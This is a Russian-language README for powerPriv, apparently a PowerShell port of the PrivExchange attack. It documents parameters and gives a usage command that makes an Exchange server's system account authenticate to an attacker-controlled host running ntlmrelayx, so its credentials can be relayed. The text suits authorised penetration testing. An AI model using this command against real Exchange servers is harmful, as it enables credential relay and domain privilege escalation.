
Реализация PrivExchange на PowerShell, предназначенная для запуска в контексте текущего пользователя
Реализация PrivExchange на PowerShell от @_dirkjan (оригинальный код находится здесь: https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py) Полезно в средах, где нельзя запускать приложения на Python, есть учетные данные пользователя или не хочется записывать файлы на диск. Приведет к тому, что системная учетная запись целевого Exchange-сервера попытается аутентифицироваться на выбранной вами системе.
-targetHostИмя хоста или IP целевого Exchange-сервера. В зависимости от настроек DNS может потребоваться FQDN, если используется имя хоста. (Обязательно)
-attackerHostИмя хоста или IP системы, которую вы контролируете, и на которой в идеале запущен ntlmrelayx. Мы указываем Exchange-серверу попытаться аутентифицироваться на этой системе. В зависимости от настроек DNS может потребоваться FQDN, если используется имя хоста. (Обязательно)
-exchangePortПорт для подключения к Exchange-серверу. По умолчанию 443.
-attackerPortПорт, на который Exchange должен попытаться подключиться обратно к атакующему. По умолчанию 80
-attackerPageСтраница, на которую мы указываем Exchange-серверу подключиться на нашей атакующей системе. Слеши не требуются. По умолчанию powerPriv.
-noSSLУстановите true, если не хотите использовать HTTPS для первоначального подключения к Exchange-серверу. По умолчанию false (использовать HTTPS).
-VersionВерсия целевого Exchange-сервера. По умолчанию 2013.
powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016
Автор: @g0ldenGunSec - На основе инструмента, созданного @_dirkjan
Используйте этот инструмент только в сетях, которыми вы владеете или на тестирование которых у вас есть разрешение.